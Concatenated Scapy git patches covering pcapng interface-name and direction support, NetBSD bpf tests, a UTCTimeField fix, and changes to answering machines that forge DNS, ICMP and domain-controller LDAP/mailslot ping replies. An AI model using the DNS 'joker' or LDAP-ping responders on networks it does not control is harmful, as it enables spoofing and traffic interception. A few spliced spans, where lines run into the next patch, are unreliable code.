b/scapy/utils.py index c6ebd97eaf3..33933c83bec 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1550,14 +1550,14 @@ class RawPcapNgReader(RawPcapReader): PacketMetadata = collections.namedtuple("PacketMetadataNg", # type: ignore ["linktype", "tsresol", "tshigh", "tslow", "wirelen", - "comment"]) + "comment", "ifname", "direction"]) def __init__(self, filename, fdesc=None, magic=None): # type: ignore # type: (str, IO[bytes], bytes) -> None self.filename = filename self.f = fdesc # A list of (linktype, snaplen, tsresol); will be populated by IDBs. - self.interfaces = [] # type: List[Tuple[int, int, int]] + self.interfaces = [] # type: List[Tuple[int, int, Dict[str, Any]]] self.default_options = { "tsresol": 1000000 } @@ -1600,6 +1600,7 @@ def _read_block(self, size=MTU): try: blocklen = struct.unpack(self.endian + "I", self.f.read(4))[0] except struct.error: + warning("PcapNg: Error reading blocklen before block body") raise EOFError if blocklen < 12: warning("Invalid block length !") @@ -1621,10 +1622,12 @@ def _read_block_tail(self, blocklen): self.f.read(4))[0]: raise EOFError("PcapNg: Invalid pcapng block (bad blocklen)") except struct.error: + warning("PcapNg: Could not read blocklen after block body") raise EOFError def _read_block_shb(self): # type: () -> None + """Section Header Block""" _blocklen = self.f.read(4) endian = self.f.read(4) if endian == b"\x1a\x2b\x3c\x4d": @@ -1636,10 +1639,21 @@ def _read_block_shb(self): raise EOFError blocklen = struct.unpack(self.endian + "I", _blocklen)[0] - if blocklen < 16: - warning("Invalid SHB block length!") + if blocklen < 28: + warning(f"Invalid SHB block length ({blocklen})!") + raise EOFError + + # Major version must be 1 + _major = self.f.read(2) + major = struct.unpack(self.endian + "H", _major)[0] + if major != 1: + warning(f"SHB Major version {major} unsupported !") raise EOFError - options = self.f.read(blocklen - 16) + + # Skip minor version & section length + self.f.read(10) + + options = self.f.read(blocklen - 28) self._read_block_tail(blocklen) self._read_options(options) @@ -1656,24 +1670,16 @@ def _read_packet(self, size=MTU): # type: ignore return res def _read_options(self, options): - # type: (bytes) -> Dict[str, Any] - """Section Header Block""" - opts = self.default_options.copy() # type: Dict[str, Any] + # type: (bytes) -> Dict[int, bytes] + opts = dict() while len(options) >= 4: code, length = struct.unpack(self.endian + "HH", options[:4]) - # PCAP Next Generation (pcapng) Capture File Format - # 4.2. - Interface Description Block - # http://xml2rfc.tools.ietf.org/cgi-bin/xml2rfc.cgi?url=https://raw.githubusercontent.com/pcapng/pcapng/master/draft-tuexen-opsawg-pcapng.xml&modeAsFormat=html/ascii&type=ascii#rfc.section.4.2 - if code == 9 and length == 1 and len(options) >= 5: - tsresol = orb(options[4]) - opts["tsresol"] = (2 if tsresol & 128 else 10) ** ( - tsresol & 127 - ) - if code == 1 and length >= 1 and 4 + length < len(options): - opts["comment"] = options[4:4 + length] + if code != 0 and 4 + length < len(options): + opts[code] = options[4:4 + length] if code == 0: if length != 0: - warning("PcapNg: invalid option length %d for end-of-option" % length) # noqa: E501 + warning("PcapNg: invalid option " + "length %d for end-of-option" % length) break if length % 4: length += (4 - (length % 4)) @@ -1685,12 +1691,28 @@ def _read_block_idb(self, block, _): """Interface Description Block""" # 2 bytes LinkType + 2 bytes Reserved # 4 bytes Snaplen - options = self._read_options(block[8:-4]) + options_raw = self._read_options(block[8:]) + options = self.default_options.copy() # type: Dict[str, Any] + for c, v in options_raw.items(): + if c == 9: + length = len(v) + if length == 1: + tsresol = orb(v) + options["tsresol"] = (2 if tsresol & 128 else 10) ** ( + tsresol & 127 + ) + else: + warning("PcapNg: invalid options " + "length %d for IDB tsresol" % length) + elif c == 2: + options["name"] = v + elif c == 1: + options["comment"] = v try: - interface: Tuple[int, int, int] = struct.unpack( + interface: Tuple[int, int, Dict[str, Any]] = struct.unpack( self.endian + "HxxI", block[:8] - ) + (options["tsresol"],) + ) + (options,) except struct.error: warning("PcapNg: IDB is too small %d/8 !" % len(block)) raise EOFError @@ -1724,17 +1746,31 @@ def _read_block_epb(self, block, size): # Parse options options = self._read_options(block[opt_offset:]) - comment = options.get("comment", None) + comment = options.get(1, None) + epb_flags_raw = options.get(2, None) + if epb_flags_raw: + try: + epb_flags, = struct.unpack(self.endian + "I", epb_flags_raw) + except struct.error: + warning("PcapNg: EPB invalid flags size" + "(expected 4 bytes, got %d) !" % len(epb_flags_raw)) + raise EOFError + direction = epb_flags & 3 - self._check_interface_id(intid) + else: + direction = None + self._check_interface_id(intid) + ifname = self.interfaces[intid][2].get('name', None) return (block[20:20 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 - tsresol=self.interfaces[intid][2], # noqa: E501 + tsresol=self.interfaces[intid][2]['tsresol'], # noqa: E501 tshigh=tshigh, tslow=tslow, wirelen=wirelen, - comment=comment)) + comment=comment, + ifname=ifname, + direction=direction)) def _read_block_spb(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1754,11 +1790,13 @@ def _read_block_spb(self, block, size): caplen = min(wirelen, self.interfaces[intid][1]) return (block[4:4 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 - tsresol=self.interfaces[intid][2], # noqa: E501 + tsresol=self.interfaces[intid][2]['tsresol'], # noqa: E501 tshigh=None, tslow=None, wirelen=wirelen, - comment=None)) + comment=None, + ifname=None, + direction=None)) def _read_block_pkt(self, block, size): # type: (bytes, int) -> Tuple[bytes, RawPcapNgReader.PacketMetadata] @@ -1775,11 +1813,13 @@ def _read_block_pkt(self, block, size): self._check_interface_id(intid) return (block[20:20 + caplen][:size], RawPcapNgReader.PacketMetadata(linktype=self.interfaces[intid][0], # noqa: E501 - tsresol=self.interfaces[intid][2], # noqa: E501 + tsresol=self.interfaces[intid][2]['tsresol'], # noqa: E501 tshigh=tshigh, tslow=tslow, wirelen=wirelen, - comment=None)) + comment=None, + ifname=None, + direction=None)) def _read_block_dsb(self, block, size): # type: (bytes, int) -> None @@ -1851,7 +1891,7 @@ def read_packet(self, size=MTU, **kwargs): rp = super(PcapNgReader, self)._read_packet(size=size) if rp is None: raise EOFError - s, (linktype, tsresol, tshigh, tslow, wirelen, comment) = rp + s, (linktype, tsresol, tshigh, tslow, wirelen, comment, ifname, direction) = rp try: cls = conf.l2types.num2layer[linktype] # type: Type[Packet] p = cls(s, **kwargs) # type: Packet @@ -1868,6 +1908,9 @@ def read_packet(self, size=MTU, **kwargs): p.time = EDecimal((tshigh << 32) + tslow) / tsresol p.wirelen = wirelen p.comment = comment + p.direction = direction + if ifname is not None: + p.sniffed_on = ifname.decode('utf-8') return p def recv(self, size: int = MTU, **kwargs: Any) -> 'Packet': # type: ignore @@ -1876,7 +1919,7 @@ def recv(self, size: int = MTU, **kwargs: Any) -> 'Packet': # type: ignore class GenericPcapWriter(object): nano = False - linktype = None # type: Optional[int] + linktype: int def _write_header(self, pkt): # type: (Optional[Union[Packet, bytes]]) -> None @@ -1884,11 +1927,14 @@ def _write_header(self, pkt): def _write_packet(self, packet, # type: Union[bytes, Packet] + linktype, # type: int sec=None, # type: Optional[float] usec=None, # type: Optional[int] caplen=None, # type: Optional[int] wirelen=None, # type: Optional[int] - comment=None # type: Optional[bytes] + comment=None, # type: Optional[bytes] + ifname=None, # type: Optional[bytes] + direction=None, # type: Optional[int] ): # type: (...) -> None raise NotImplementedError @@ -1912,7 +1958,7 @@ def _get_time(self, def write_header(self, pkt): # type: (Optional[Union[Packet, bytes]]) -> None - if self.linktype is None: + if not hasattr(self, 'linktype'): try: if pkt is None or isinstance(pkt, bytes): # Can't guess LL @@ -1970,12 +2016,24 @@ def write_packet(self, wirelen = caplen comment = getattr(packet, "comment", None) - + ifname = getattr(packet, "sniffed_on", None) + direction = getattr(packet, "direction", None) + if not isinstance(packet, bytes): + linktype: int = conf.l2types.layer2num[ + packet.__class__ + ] + else: + linktype = self.linktype + if ifname is not None: + ifname = str(ifname).encode('utf-8') self._write_packet( rawpkt, sec=f_sec, usec=usec, caplen=caplen, wirelen=wirelen, - comment=comment + comment=comment, + ifname=ifname, + direction=direction, + linktype=linktype ) @@ -2068,7 +2126,8 @@ def __init__(self, """ - self.linktype = linktype + if linktype: + self.linktype = linktype self.snaplen = snaplen self.append = append self.gz = gz @@ -2109,7 +2168,7 @@ def _write_header(self, pkt): finally: g.close() - if self.linktype is None: + if not hasattr(self, 'linktype'): raise ValueError( "linktype could not be guessed. " "Please pass a linktype while creating the writer" @@ -2121,11 +2180,14 @@ def _write_header(self, pkt): def _write_packet(self, packet, # type: Union[bytes, Packet] + linktype, # type: int sec=None, # type: Optional[float] usec=None, # type: Optional[int] caplen=None, # type: Optional[int] wirelen=None, # type: Optional[int] - comment=None # type: Optional[bytes] + comment=None, # type: Optional[bytes] + ifname=None, # type: Optional[bytes] + direction=None, # type: Optional[int] ): # type: (...) -> None """ @@ -2133,6 +2195,8 @@ def _write_packet(self, :param packet: bytes for a single packet :type packet: bytes + :param linktype: linktype value associated with the packet + :type linktype: int :param sec: time the packet was captured, in seconds since epoch. If not supplied, defaults to now. :type sec: float @@ -2179,7 +2243,9 @@ def __init__(self, self.header_present = False self.tsresol = 1000000 - self.linktype = DLT_EN10MB + # A dict to keep if_name to IDB id mapping. + # unknown if_name(None) id=0 + self.interfaces2id: Dict[Optional[bytes], int] = {None: 0} # tcpdump only support little-endian in PCAPng files self.endian = "<" @@ -2236,7 +2302,7 @@ def _write_header(self, pkt): if not self.header_present: self.header_present = True self._write_block_shb() - self._write_block_idb() + self._write_block_idb(linktype=self.linktype) def _write_block_shb(self): # type: () -> None @@ -2250,23 +2316,34 @@ def _write_block_shb(self): # Minor Version block_shb += struct.pack(self.endian + "H", 0) # Section Length - block_shb += struct.pack(self.endian + "Q", 0) + block_shb += struct.pack(self.endian + "q", -1) self.f.write(self.build_block(block_type, block_shb)) - def _write_block_idb(self): - # type: () -> None + def _write_block_idb(self, + linktype, # type: int + ifname=None # type: Optional[bytes] + ): + # type: (...) -> None # Block Type block_type = struct.pack(self.endian + "I", 1) # LinkType - block_idb = struct.pack(self.endian + "H", self.linktype) + block_idb = struct.pack(self.endian + "H", linktype) # Reserved block_idb += struct.pack(self.endian + "H", 0) # SnapLen block_idb += struct.pack(self.endian + "I", 262144) - self.f.write(self.build_block(block_type, block_idb)) + # if_name option + opts = None + if ifname is not None: + opts = struct.pack(self.endian + "HH", 2, len(ifname)) + # Pad Option Value to 32 bits + opts += self._add_padding(ifname) + opts += struct.pack(self.endian + "HH", 0, 0) + + self.f.write(self.build_block(block_type, block_idb, options=opts)) def _write_block_spb(self, raw_pkt): # type: (bytes) -> None @@ -2282,10 +2359,12 @@ def _write_block_spb(self, raw_pkt): def _write_block_epb(self, raw_pkt, # type: bytes + ifid, # type: int timestamp=None, # type: Optional[Union[EDecimal, float]] # noqa: E501 caplen=None, # type: Optional[int] orglen=None, # type: Optional[int] - comment=None # type: Optional[bytes] + comment=None, # type: Optional[bytes] + flags=None, # type: Optional[int] ): # type: (...) -> None @@ -2305,7 +2384,7 @@ def _write_block_epb(self, # Block Type block_type = struct.pack(self.endian + "I", 6) # Interface ID - block_epb = struct.pack(self.endian + "I", 0) + block_epb = struct.pack(self.endian + "I", ifid) # Timestamp (High) block_epb += struct.pack(self.endian + "I", ts_high) # Timestamp (Low) @@ -2317,26 +2396,32 @@ def _write_block_epb(self, # Packet Data block_epb += raw_pkt - # Comment option - comment_opt = None - if comment: + # Options + opts = b'' + if comment is not None: comment = bytes_encode(comment) - comment_opt = struct.pack(self.endian + "HH", 1, len(comment)) - + opts += struct.pack(self.endian + "HH", 1, len(comment)) # Pad Option Value to 32 bits - comment_opt += self._add_padding(bytes_encode(comment)) - comment_opt += struct.pack(self.endian + "HH", 0, 0) + opts += self._add_padding(comment) + if type(flags) == int: + opts += struct.pack(self.endian + "HH", 2, 4) + opts += struct.pack(self.endian + "I", flags) + if opts: + opts += struct.pack(self.endian + "HH", 0, 0) self.f.write(self.build_block(block_type, block_epb, - options=comment_opt)) + options=opts)) def _write_packet(self, # type: ignore packet, # type: bytes + linktype, # type: int sec=None, # type: Optional[float] usec=None, # type: Optional[int] caplen=None, # type: Optional[int] wirelen=None, # type: Optional[int] - comment=None # type: Optional[bytes] + comment=None, # type: Optional[bytes] + ifname=None, # type: Optional[bytes] + direction=None, # type: Optional[int] ): # type: (...) -> None """ @@ -2344,6 +2429,8 @@ def _write_packet(self, # type: ignore :param packet: bytes for a single packet :type packet: bytes + :param linktype: linktype value associated with the packet + :type linktype: int :param sec: time the packet was captured, in seconds since epoch. If not supplied, defaults to now. :type sec: float @@ -2353,6 +2440,21 @@ def _write_packet(self, # type: ignore :param wirelen: The length of the packet on the wire. If not specified, uses ``caplen``. :type wirelen: int + :param comment: UTF-8 string containing human-readable comment text + that is associated to the current block. Line separators + SHOULD be a carriage-return + linefeed ('\r\n') or + just linefeed ('\n'); either form may appear and + be considered a line separator. The string is not + zero-terminated. + :type bytes + :param ifname: UTF-8 string containing the + name of the device used to capture data. + The string is not zero-terminated. + :type bytes + :param direction: 0 = information not available, + 1 = inbound, + 2 = outbound + :type int :return: None :rtype: None """ @@ -2361,8 +2463,21 @@ def _write_packet(self, # type: ignore if wirelen is None: wirelen = caplen + ifid = self.interfaces2id.get(ifname, None) + if ifid is None: + ifid = max(self.interfaces2id.values()) + 1 + self.interfaces2id[ifname] = ifid + self._write_block_idb(linktype=linktype, ifname=ifname) + + # EPB flags (32 bits). + # currently only direction is implemented (least 2 significant bits) + if type(direction) == int: + flags = direction & 0x3 + else: + flags = None + self._write_block_epb(packet, timestamp=sec, caplen=caplen, - orglen=wirelen, comment=comment) + orglen=wirelen, comment=comment, ifid=ifid, flags=flags) if self.sync: self.f.flush() diff --git a/test/regression.uts b/test/regression.uts index 8aa4dffc5c7..30c51f84cf5 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2136,6 +2136,7 @@ p.show() ############ ############ + pcap / pcapng format support +~ pcap = Variable creations from io import BytesIO @@ -2170,9 +2171,9 @@ assert len(pktcapng) != 0 tmpfile = get_temp_file(autoext=".pcapng") r = RawPcapNgWriter(tmpfile) r._write_block_shb() -r._write_block_idb() +r._write_block_idb(linktype=DLT_EN10MB) ts = 1632568366.384185 -r._write_block_epb(raw(Ether()/"Hello Scapy!!!"), ts) +r._write_block_epb(raw(Ether()/"Hello Scapy!!!"), ifid=0, timestamp=ts) r.f.close() assert os.stat(tmpfile).st_size == 108 @@ -2200,6 +2201,57 @@ wrpcapng(tmpfile, p) l = rdpcap(tmpfile) assert l[0].comment == p.comment += Check multiple packets with different combination of linktype,comment,direction,sniffed_on fields. test both wrpcap() and wrpcapng() +import random,string +random.seed(0x2807) +plist = [] +ptypes = [] +ptypes.append(Ether((Ether() / IPv6() / TCP()).build())) +ptypes.append(IP((IP() / IPv6() / TCP()).build())) +ifaces=[None,'','i','int0',''.join(random.choices(string.printable,k=20))] +comments=[None,'','a','abcd',''.join(random.choices(string.printable,k=20))] +directions=[None,0,1,2,3] + +for iface in ifaces: + for comment in comments: + if comment is not None: + comment=comment.encode('utf-8') + for direction in directions: + for p in ptypes: + if iface is not None and type(ptypes[ifaces.index(iface) % len(ptypes)]) != type(p): + continue + pnew = p.copy() + pnew.time = 1632568366.384185 + pnew.sniffed_on = iface + pnew.direction = direction + pnew.comment = comment + plist.append(pnew) + +random.shuffle(plist) +tmpfile = get_temp_file(autoext=".pcapng") +wrpcapng(tmpfile, plist) +plist_check = rdpcap(tmpfile) +assert len(plist_check) == len(plist) +for i in range(len(plist)): + assert plist_check[i].comment == plist[i].comment + assert plist_check[i].direction == plist[i].direction + assert plist_check[i].sniffed_on == plist[i].sniffed_on + assert plist_check[i].time == plist[i].time + #if interface is unknown, verify pkt bytes integrity and that linktype was set to first packet + if plist[i].sniffed_on is None: + assert bytes(plist_check[i]) == bytes(plist[i]) + assert type(plist_check[i]) == type(plist[0]) + else: + assert plist_check[i] == plist[i] + +tmpfile = get_temp_file(autoext=".pcap") +wrpcap(tmpfile, plist) +plist_check = rdpcap(tmpfile) +for i in range(len(plist)): + assert plist_check[i].time == plist[i].time + assert type(plist_check[i]) == type(plist[0]) + assert bytes(plist_check[i]) == bytes(plist[i]) + = Read a pcap file with wirelen != captured len pktpcapwirelen = rdpcap(pcapwirelenfile) @@ -2305,7 +2357,7 @@ l = sniff(offline=IP()/UDP(sport=(10000, 10001)), filter="tcp") assert len(l) == 0 = Check offline sniff() with Packets, tcpdump and a bad filter -~ tcpdump libpcap +~ tcpdump libpcap try: sniff(offline=IP()/UDP(), filter="bad filter") @@ -2404,7 +2456,7 @@ except Scapy_Exception: pass # Invalid Packet in PCAPNG -> return -invalid_pcapngfile_2 = BytesIO(b'\n\r\r\n\x00\x00\x00\x10\x1a+ raise EOFError From bcf500d8720268a187eef148c91c2015d0f07e1f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 28 Apr 2024 19:06:58 +0200 Subject: [PATCH 1259/1632] NetBSD 10.0+ supports bpf on lo --- .config/ci/test.sh | 4 ---- test/bpf.uts | 5 +---- 2 files changed, 1 insertion(+), 8 deletions(-) diff --git a/.config/ci/test.sh b/.config/ci/test.sh index 7da89300579..67adfe82c98 100755 --- a/.config/ci/test.sh +++ b/.config/ci/test.sh @@ -35,10 +35,6 @@ then # the cryptogaphy module source code UT_FLAGS+=" -K libressl" fi - if [[ "$OSTYPE" = "netbsd" ]] - then - UT_FLAGS+=" -K not_netbsd" - fi fi if [ ! -z "$GITHUB_ACTIONS" ] diff --git a/test/bpf.uts b/test/bpf.uts index 13bfb1e2bfb..b35ef482a8a 100644 --- a/test/bpf.uts +++ b/test/bpf.uts @@ -146,10 +146,7 @@ s.assigned_interface = conf.loopback_name s.send(IP(dst="8.8.8.8")/ICMP()) = L3bpfSocket - send and sniff on loopback -~ needs_root not_netbsd - -# Note: as of November 2022, it is not possible to send packet on lo0 -# using bpf on NetBSD 9.3 +~ needs_root localhost_ip = conf.ifaces[conf.loopback_name].ips[4][0] From 7ec90239773ec3a1282012e7584839b70352ef84 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 21 Apr 2024 00:19:30 +0200 Subject: [PATCH 1260/1632] Fix UTCTimeField before epoch on Windows This fixes UTCTimeField that have a value before 1970 on Windows. fixes #4308 --- scapy/fields.py | 9 +++++++-- test/fields.uts | 22 ++++++++++++++++++++++ 2 files changed, 29 insertions(+), 2 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index 7f9da8e10b8..2ac44ff616b 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -12,6 +12,7 @@ import calendar import collections import copy +import datetime import inspect import math import socket @@ -19,7 +20,6 @@ import time import warnings -from datetime import datetime from types import MethodType from uuid import UUID from enum import Enum @@ -3520,7 +3520,12 @@ def i2repr(self, pkt, x): elif self.custom_scaling: x = x / self.custom_scaling x += self.delta - t = datetime.fromtimestamp(x).strftime(self.strf) + # To make negative timestamps work on all plateforms (e.g. Windows), + # we need a trick. + t = ( + datetime.datetime(1970, 1, 1) + + datetime.timedelta(seconds=x) + ).strftime(self.strf) return "%s (%d)" % (t, int(x)) def i2m(self, pkt, x): diff --git a/test/fields.uts b/test/fields.uts index dd90c01948b..2262ec32d6f 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -365,6 +365,28 @@ p = TestBitLenField(b'\xc0\x01\xf4') assert p.mode == 3 assert p.value == 500 += Test UTCTimeField +~ field + +class TestUTCTimeField(Packet): + fields_desc = [ + # A Windows time field. See GH#4308 + UTCTimeField( + "Time", + None, + fmt=" Date: Sun, 21 Apr 2024 02:00:00 +0200 Subject: [PATCH 1261/1632] AnsweringMachines: better defaults, various fixes - Use sendp by default. This works better in some cases (e.g. ICMP) - Test some answering machines that were yet untested (LdapPing_am) - Cleanup the NBNS answering machine and regroup with LdapPing_am --- doc/notebooks/Scapy in 15 minutes.ipynb | 2 +- scapy/ansmachine.py | 4 +- scapy/layers/dhcp.py | 3 +- scapy/layers/dhcp6.py | 2 + scapy/layers/dns.py | 28 ++++++- scapy/layers/dot11.py | 2 +- scapy/layers/inet.py | 14 +++- scapy/layers/ldap.py | 69 +++++++++++++++- scapy/layers/netbios.py | 52 +++--------- test/answering_machines.uts | 101 ++++++++++++++++++++++-- 10 files changed, 211 insertions(+), 66 deletions(-) diff --git a/doc/notebooks/Scapy in 15 minutes.ipynb b/doc/notebooks/Scapy in 15 minutes.ipynb index 7cc498d710b..57befdb3ffb 100644 --- a/doc/notebooks/Scapy in 15 minutes.ipynb +++ b/doc/notebooks/Scapy in 15 minutes.ipynb @@ -1136,7 +1136,7 @@ " rep /= Dot11Elt(ID=\"Rates\",info=b'\\x82\\x84\\x0b\\x16\\x96')\n", " rep /= Dot11Elt(ID=\"DSset\",info=chr(10))\n", "\n", - " OK,return rep\n", + " return rep\n", "\n", "# Start the answering machine\n", "#ProbeRequest_am()() # uncomment to test" diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 8b206f4335d..3c5cb865d33 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -19,7 +19,7 @@ from scapy.arch import get_if_addr from scapy.config import conf -from scapy.sendrecv import send, sniff, AsyncSniffer +from scapy.sendrecv import sendp, sniff, AsyncSniffer from scapy.packet import Packet from scapy.plist import PacketList @@ -75,7 +75,7 @@ class AnsweringMachine(Generic[_T], metaclass=ReferenceAM): "type", "prn", "stop_filter", "opened_socket"] send_options = {"verbose": 0} # type: Dict[str, Any] send_options_list = ["iface", "inter", "loop", "verbose", "socket"] - send_function = staticmethod(send) + send_function = staticmethod(sendp) def __init__(self, **kargs): # type: (Any) -> None diff --git a/scapy/layers/dhcp.py b/scapy/layers/dhcp.py index 3b316da0f48..2620c6e6583 100644 --- a/scapy/layers/dhcp.py +++ b/scapy/layers/dhcp.py @@ -55,7 +55,7 @@ ) from scapy.arch import get_if_raw_hwaddr -from scapy.sendrecv import srp1, sendp +from scapy.sendrecv import srp1 from scapy.error import warning from scapy.config import conf @@ -587,7 +587,6 @@ def dhcp_request(hw=None, class BOOTP_am(AnsweringMachine): function_name = "bootpd" filter = "udp and port 68 and port 67" - send_function = staticmethod(sendp) def parse_options(self, pool=Net("192.168.1.128/25"), diff --git a/scapy/layers/dhcp6.py b/scapy/layers/dhcp6.py index 8b37ac725ad..79e978e4785 100644 --- a/scapy/layers/dhcp6.py +++ b/scapy/layers/dhcp6.py @@ -32,6 +32,7 @@ IPv6 from scapy.packet import Packet, bind_bottom_up from scapy.pton_ntop import inet_pton +from scapy.sendrecv import send from scapy.themes import Color from scapy.utils6 import in6_addrtovendor, in6_islladdr @@ -1443,6 +1444,7 @@ def answers(self, other): class DHCPv6_am(AnsweringMachine): function_name = "dhcp6d" filter = "udp and port 546 and port 547" + send_function = staticmethod(send) def usage(self): msg = """ diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index f183ec2552c..fd53d25b22d 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -54,6 +54,7 @@ from scapy.pton_ntop import inet_ntop, inet_pton from scapy.volatile import RandShort +from scapy.layers.l2 import Ether from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP from typing import ( @@ -1428,12 +1429,14 @@ def parse_options(self, joker=None, from_ip6=None, src_ip=None, src_ip6=None, - ttl=10): + ttl=10, + jokerarpa=None): """ :param joker: default IPv4 for unresolved domains. (Default: None) Set to False to disable, None to mirror the interface's IP. :param joker6: default IPv6 for unresolved domains (Default: False) set to False to disable, None to mirror the interface's IPv6. + :param jokerarpa: answer for .in-addr.arpa PTR requests. (Default: None) :param relay: relay unresolved domains to conf.nameservers (Default: False). :param match: a dictionary of {name: val} where name is a string representing a domain name (A, AAAA) and val is a tuple of 2 elements, each @@ -1477,6 +1480,7 @@ def normk(k): self.srvmatch = {normk(k): normv(v) for k, v in srvmatch.items()} self.joker = joker self.joker6 = joker6 + self.jokerarpa = jokerarpa self.relay = relay if isinstance(from_ip, str): self.from_ip = Net(from_ip) @@ -1506,11 +1510,19 @@ def is_request(self, req): ) def make_reply(self, req): + resp = req.copy() + if Ether in req: + resp[Ether].src, resp[Ether].dst = ( + None if req[Ether].dst == "ff:ff:ff:ff:ff:ff" else req[Ether].dst, + req[Ether].src, + ) from scapy.layers.inet6 import IPv6 if IPv6 in req: - resp = IPv6(dst=req[IPv6].src, src=self.src_ip6) + resp[IPv6].underlayer.remove_payload() + resp /= IPv6(dst=req[IPv6].src, src=self.src_ip6 or req[IPv6].dst) else: - resp = IP(dst=req[IP].src, src=self.src_ip) + resp[IP].underlayer.remove_payload() + resp /= IP(dst=req[IP].src, src=self.src_ip or req[IP].dst) resp /= UDP(sport=req.dport, dport=req.sport) ans = [] req = req.getlayer(self.cls) @@ -1563,6 +1575,16 @@ def make_reply(self, req): except KeyError: # No result pass + elif rq.qtype == 12: + # PTR + if rq.qname[-14:] == b".in-addr.arpa." and self.jokerarpa: + ans.append(DNSRR( + rrname=rq.qname, + type=rq.qtype, + ttl=self.ttl, + rdata=self.jokerarpa, + )) + continue # It it arrives here, there is currently no answer if self.relay: # Relay mode ? diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index f2d7326b357..8ed4d38cd0e 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -2061,7 +2061,7 @@ def make_reply(self, p): ip = p.getlayer(IP) tcp = p.getlayer(TCP) pay = raw(tcp.payload) - del p.payload.payload.payload + p[IP].underlayer.remove_payload() p.FCfield = "from-DS" p.addr1, p.addr2 = p.addr2, p.addr1 p /= IP(src=ip.dst, dst=ip.src) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index b100c78d473..9003ccf82db 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -2506,15 +2506,21 @@ def is_request(self, req): return False def print_reply(self, req, reply): - print("Replying %s to %s" % (reply.getlayer(IP).dst, req.dst)) + print("Replying %s to %s" % (reply[IP].dst, req[IP].dst)) def make_reply(self, req): - reply = IP(dst=req[IP].src) / ICMP() + reply = req.copy() reply[ICMP].type = 0 # echo-reply - reply[ICMP].seq = req[ICMP].seq - reply[ICMP].id = req[ICMP].id # Force re-generation of the checksum reply[ICMP].chksum = None + if req.haslayer(IP): + reply[IP].src, reply[IP].dst = req[IP].dst, req[IP].src + reply[IP].chksum = None + if req.haslayer(Ether): + reply[Ether].src, reply[Ether].dst = ( + None if req[Ether].dst == "ff:ff:ff:ff:ff:ff" else req[Ether].dst, + req[Ether].src, + ) return reply diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 97fc2096332..8f53ec7c835 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -22,6 +22,7 @@ from enum import Enum +from scapy.arch import get_if_addr from scapy.ansmachine import AnsweringMachine from scapy.asn1.asn1 import ( ASN1_STRING, @@ -54,6 +55,7 @@ bind_bottom_up, bind_layers, ) +from scapy.sendrecv import send from scapy.supersocket import ( SimpleSocket, StreamSocket, @@ -72,6 +74,7 @@ from scapy.layers.kerberos import ( _ASN1FString_PacketField, ) +from scapy.layers.netbios import NBTDatagram from scapy.layers.smb import ( NETLOGON, NETLOGON_SAM_LOGON_RESPONSE_EX, @@ -708,7 +711,8 @@ def answers(self, other): class LdapPing_am(AnsweringMachine): function_name = "ldappingd" - filter = "udp port 389" + filter = "udp port 389 or 138" + send_function = staticmethod(send) def parse_options( self, @@ -737,6 +741,16 @@ def is_request(self, req): # (&(DnsDomain=abcde.corp.microsoft.com)(Host=abcdefgh-dev)(User=abcdefgh- # dev$)(AAC=\80\00\00\00)(DomainGuid=\3b\b0\21\ca\d3\6d\d1\11\8a\7d\b8\df\b1\56\87\1f)(NtVer # =\06\00\00\00)) + if NBTDatagram in req: + # special case: mailslot ping + from scapy.layers.smb import SMBMailslot_Write, NETLOGON_SAM_LOGON_REQUEST + try: + return ( + SMBMailslot_Write in req and + NETLOGON_SAM_LOGON_REQUEST in req.Data + ) + except AttributeError: + return False if CLDAP not in req or not isinstance(req.protocolOp, LDAP_SearchRequest): return False req = req.protocolOp @@ -751,10 +765,13 @@ def is_request(self, req): ) def make_reply(self, req): + if NBTDatagram in req: + # Special case + return self.make_mailslot_ping_reply(req) if IPv6 in req: - resp = IPv6(dst=req[IPv6].src, src=self.src_ip6) + resp = IPv6(dst=req[IPv6].src, src=self.src_ip6 or req[IPv6].dst) else: - resp = IP(dst=req[IP].src, src=self.src_ip) + resp = IP(dst=req[IP].src, src=self.src_ip or req[IP].dst) resp /= UDP(sport=req.dport, dport=req.sport) # get the DnsDomainName from the request try: @@ -778,7 +795,7 @@ def make_reply(self, req): NETLOGON_SAM_LOGON_RESPONSE_EX( # Mandatory fields DnsDomainName=DnsDomainName, - NtVersion=5, + NtVersion="V1+V5", LmNtToken=65535, Lm20Token=65535, # Below can be customized @@ -813,6 +830,50 @@ def make_reply(self, req): ) ) + def make_mailslot_ping_reply(self, req): + # type: (Packet) -> Packet + from scapy.layers.smb import ( + SMBMailslot_Write, + SMB_Header, + DcSockAddr, + NETLOGON_SAM_LOGON_RESPONSE_EX, + ) + resp = IP(dst=req[IP].src) / UDP( + sport=req.dport, + dport=req.sport, + ) + address = self.src_ip or get_if_addr(self.optsniff.get("iface", conf.iface)) + resp /= NBTDatagram( + SourceName=req.DestinationName, + SUFFIX1=req.SUFFIX2, + DestinationName=req.SourceName, + SUFFIX2=req.SUFFIX1, + SourceIP=address, + ) / SMB_Header() / SMBMailslot_Write( + Name=req.Data.MailslotName, + ) + NetbiosDomainName = req.DestinationName.strip() + resp.Data = NETLOGON_SAM_LOGON_RESPONSE_EX( + # Mandatory fields + NetbiosDomainName=NetbiosDomainName, + 